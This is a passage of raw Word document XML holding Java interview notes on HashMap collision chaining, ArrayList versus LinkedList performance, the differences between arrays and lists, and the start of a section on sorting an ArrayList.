    <w:p w14:paraId="676C31F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if the hash function disperses the keys uniformly, and the number of elements in a bucket is small, the time complexity remains close to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most operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC60575"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 for Tree Conversion</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Starting from Java 8, if the number of elements in a bucket exceeds a certain threshold (by default, 8), and the total number of buckets exceeds a certain size (by default, 64), the linked list is converted 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Red-Black Tree). This conversion improves performance by reducing the worst-case lookup time from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for large chains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CC37D7"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Map with LinkedList:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8700E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onsider a scenario where we have multiple keys hashing to the same bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0239A66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78B1C87B" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57651BA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LinkedListExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE3E2DD"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830D6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Map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A60F7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58AB58E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7DD97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elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370BFA9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ne", "1");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6198C586"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wo", "2");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDE83A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hree", "3");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6CFBE0"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079D4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a duplicate key to create a collision (same hash code)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6629DC5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uno", "1"); // "uno" and "one" may have the same hash code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF7329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C0EFE"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HashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B7D4C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ashMap: " + map);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316BB4F5"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9F7D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75CEF7"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4391CE18" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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one" and "uno" have the same hash code (based on the hash function used), both key-value pairs will end up in the same bucket. This bucket will internally mainta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store both the "one" and "uno" entries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9C4C0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LinkedList is Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461CA1AC" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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will creat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bucket's index and store the following entries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53731F1F" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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1) → Points to → (uno, 1) (if they have the same hash).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027DC7B9"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2E63C76B"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used internally by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resolve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If multiple elements map to the same bucket (i.e., they have the same hash code), they are stored in a linked list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E62B17"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number of elements in a bucket grows large (more than 8 entries), the linked list can be converted to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to improve performance, ensuring that operations are still efficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0FEC5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Do You Encounter LinkedList in HashMap?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E9CCE5"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multiple keys hash to the same bucket</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i.e., hash collision occurs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0266557F"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re are collisions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the elements in a bucket exceed a threshold,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to maintain those elements in the same bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B1B3DD" w14:textId="3F29C8F9"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0" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7531114C"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7" w:name="_Toc197867361"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Which among ArrayList and LinkedList will be more efficient for random access of data?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="147"/>
    </w:p>
    <w:p w14:paraId="02107365" w14:textId="32D28283" w:rsidR="00A836BB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A836BB" w:rsidP="00E7576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random access of data</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C2790CE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EB01A3"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6AA89A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 structure</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: ArrayList is backed by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which allows for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>constant-time (O(1)) random access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to elements using an index. This is because arrays provide direct access to elements at any given index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3770AC48"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In an ArrayList, accessing an element at a specific index is done in constant time, i.e., the time it takes to retrieve the element does not depend on the size of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788E1859"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E49187F"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de-based structure</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elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553DBE3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versal overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: To access an element at a specific index in a LinkedList, you may have to traverse the list from the head or tail until you reach the desired index. This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re n is the number of elements in the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB81EF9"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efficient random access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The lack of direct indexing (like in an array) means that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not as efficient for random access compared to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E89171C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C489983"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83618AC"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E5D4F7C"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CBF0916"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7CC5DF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363CD54C"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It is especially useful when frequent access to elements by index is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CF89EB"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 LinkedList is more efficient for operations like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>add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move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dL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Last()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EAD6E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428620" w14:textId="77777777" w:rsidR="00A836BB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A836BB" w:rsidP="00E75760">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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be more efficient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ecause it provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>constant-time access (O(1))</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to any element by index, whi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requires traversal and has a linear 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5E8BC132" w14:textId="5C00968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1" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCD7F66" w14:textId="4FB1FF2C" w:rsidR="0083091F" w:rsidRPr="00CE4B95" w:rsidRDefault="0083091F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="148" w:name="_Toc197867362"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Array, ArrayList and LinkedList? When you will use ArrayList and LinkedList?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="148"/>
    </w:p>
    <w:p w14:paraId="3497F918" w14:textId="77777777" w:rsidR="000C1D50" w:rsidRPr="00CE4B95" w:rsidRDefault="000C1D50" w:rsidP="00E75760">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CCCC686" w14:textId="41780656" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="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p>
    <w:p w14:paraId="16E8DAB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xml:space="preserve">: The size of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fixed at the time of creation and cannot be changed after that.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1BAF17"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An array is contiguous in memory, meaning all its elements are stored in adjacent memory locations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0718F4E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Arrays can store elements of a specific type, such as int[], String[], etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6378ED68"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as elements are stored in contiguous memory locations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3138894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Inserting or deleting elements in the middle of an array is costly because it may require shifting elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F7EC45"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 Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you know the exact number of elements in advance and do not need to modify the size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222FEDBB"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umbers = new int[5];  // Array with fixed size 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BFF088"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0] = 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157B63D5"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39B18E5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part of the Java Collections Framework and dynamically resizes itself when elements are added or removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAF512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The internal structure is an array, and as the array fills up,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utomatically grows by allocating a new, larger array and copying over the elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC987C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an store any type of object, typically generics like ArrayList&lt;Integer&gt;, ArrayList&lt;String&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3169ECA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similar to arrays.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A98276"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Insertions at the end are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insertions/deletions in the middle can b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shifting elements is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFECBF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need a resizable list and need fast access to elements by index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E4DB63"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17C1586F"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6F6A4A47"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20);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB06939"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19C18B0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lso part of the Java Collections Framework and does not have a fixed size. It can grow or shrink dynamically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31000EF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It uses nodes where each node stores the data and references to the next and previous nodes in the list (doubly linked).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4A2D9B"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store any type of object, similar to ArrayList but using a different internal structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC48F64"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 time (O(n))</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for accessing elements by index, as it requires traversing the list from the head or tail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BDC160"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ons and deletions at the beginning or middle of the list since only the references need to be changed. Operations ar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already have a reference to the node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B055B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frequently need to add or remove elements from the beginning or middle of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D63A02"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lt;Integer&gt; list = new LinkedList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7C2C5A"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19BE596E"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First(5);  // Adds at the beginning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3679978B"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 vs. LinkedList:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B78D61"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B7B2E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constant time) to elements using an index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0758357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elements is not known in advance but will likely grow or shrink frequently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E09053A"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mostly need to add or remove elements from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 (amortized O(1) for add).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1A75D6"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on’t need to insert or remove elements frequently from the middle or beginning, as those operations can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>slow</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (O(n) for shifting elements).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61275E9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3E63D9FC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD72C98"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from the beginning or middle of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD69557"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ast random access by index, as accessing an element by index in a LinkedList can be slower (O(n)).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022C0772"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mplementation, since LinkedList implements the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Deque</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> interface, allowing you to add and remove elements from both ends efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2655E9"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xml:space="preserve"> is not a primary concern since a linked list requires additional memory for the references in each node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBAC00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4A6500F1"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563"/>
        <w:gridCol w:w="874"/>
        <w:gridCol w:w="2114"/>
      </w:tblGrid>
      <w:tr w:rsidR="009E5CFE" w:rsidRPr="00CE4B95" w14:paraId="7CE372A4" w14:textId="77777777" w:rsidTr="00FC7EFA">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39473B3C"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CB84BCD"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54103F7"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6A41E46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E5CFE" w:rsidRPr="00CE4B95" w14:paraId="349EB958" w14:textId="77777777" w:rsidTr="00FC7EFA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CB20520"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by index)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="147B66B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D20E00F"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1408E4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9E5CFE" w:rsidRPr="00CE4B95" w14:paraId="17CF2BB9" w14:textId="77777777" w:rsidTr="00FC7EFA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48393B5C"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End</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56A722D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64EFA96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943C45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675A22E" w14:textId="77777777" w:rsidTr="00FC7EFA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01CD18F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Beginning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3442D35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2B322E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2D4FB8EA"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0AF06F9" w14:textId="77777777" w:rsidTr="00FC7EFA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49DB9FE5"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Middle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0991DE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3C06F5D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721312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r w:rsidR="009E5CFE" w:rsidRPr="00CE4B95" w14:paraId="3E7FA77C" w14:textId="77777777" w:rsidTr="00FC7EFA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35AB587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End</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="096CED07"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32CDD05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1CBDF57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57312ABC" w14:textId="77777777" w:rsidTr="00FC7EFA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="424909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Beginning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06F1E7F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95D397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587337D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48B8A280" w14:textId="77777777" w:rsidTr="00FC7EFA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1441580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in Middle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29DA9CF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42C4B8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FDA674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bl>
    <w:p w14:paraId="6E3ED99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C2DA468"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etter when you need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mostly add/remove elements at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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E09190C"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better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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>begin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iddle</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EFF27C" w14:textId="71F9A13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2" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9F7AF6"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9" w:name="_Toc197867363"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to sort the ArrayList?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="149"/>
    </w:p>
    <w:p w14:paraId="76B9D886" w14:textId="35112EC0"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sort an ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java, you can use 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or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for Java 8 and later). The sorting can be done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and you can also customize the sorting order us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52B4820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ing in Ascending Order using Collections.sort()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71ECBEA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sorts the elements of the list in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ascending order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> according to their natural order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225BC9E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65DF2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2EA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76F752" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BFABA2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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC3B7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55C58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2487CA2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0862E2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548EB84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240150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6F7429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5655D5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E57FF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406BAE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E05E70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7E2E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ABE34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4DED859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2B162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FE7C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D060CF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2C2BAFA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ing in Descending Order using Collections.sort() and Collections.reverseOrder()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FD75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ort in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>descending order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
